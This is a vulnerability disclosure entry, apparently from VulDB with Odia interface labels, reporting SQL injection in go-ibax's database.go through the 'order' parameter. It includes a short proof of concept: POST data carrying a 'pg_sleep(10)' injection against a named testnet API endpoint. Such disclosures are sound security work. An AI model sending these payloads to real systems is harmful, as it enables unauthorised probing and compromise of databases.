ଜମା କରନ୍ତୁ #50343: SQL injection vulnerability in go-ibax via order parameterସୂଚନା

ଶୀର୍ଷକSQL injection vulnerability in go-ibax via order parameter
ବର୍ଣ୍ଣନାSQL Injection vulnerability in /packages/api/database.go of go-ibax via order parameter . This issue affects versions starting from commits on Jul 18, 2020. file: https://github.com/IBAX-io/go-ibax/blob/6bac7462801b5e6da47f1231681bb1516a7dd4bb/packages/api/database.go#L187 https://github.com/IBAX-io/go-ibax/blob/6bac7462801b5e6da47f1231681bb1516a7dd4bb/packages/api/database.go#L189 commits: https://github.com/IBAX-io/go-ibax/commit/ac760982dc31edc904c160c2e5707a28798646e2#diff-bcab25c94cb216acdcdc607a2071aa896f187754698d3d523050308e17f32aabR172 https://github.com/IBAX-io/go-ibax/commit/ac760982dc31edc904c160c2e5707a28798646e2#diff-bcab25c94cb216acdcdc607a2071aa896f187754698d3d523050308e17f32aabR174 POC: Request URL: https://testnet-hk1.ibax.network:5079/api/v2/open/rowsInfo Request Method: POST PostData: ① order=1%3b+select+pg_sleep(10)--&table_name=pg_user&limit=1&page=1 ② with where parameter : order=1%3b+select+pg_sleep(10)--&table_name=pg_user&where=1=1&limit=1&page=1
ଉତ୍ସ⚠️ https://github.com/IBAX-io/go-ibax/issues/2062
ଉପଭୋକ୍ତା
 Tomy (UID 34751)
ଦାଖଲ11/01/2022 12:40 PM (3 ବର୍ଷ ବର୍ଷ ago)
ମଧ୍ୟମ ଧରଣର11/01/2022 04:43 PM (4 hours later)
ସ୍ଥିତିଗ୍ରହଣ କରାଯାଇଛି
VulDB ଏଣ୍ଟ୍ରି212637 [IBAX go-ibax /api/v2/open/rowsInfo order SQL ଇଞ୍ଜେକ୍ସନ]
ପଏଣ୍ଟ20

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!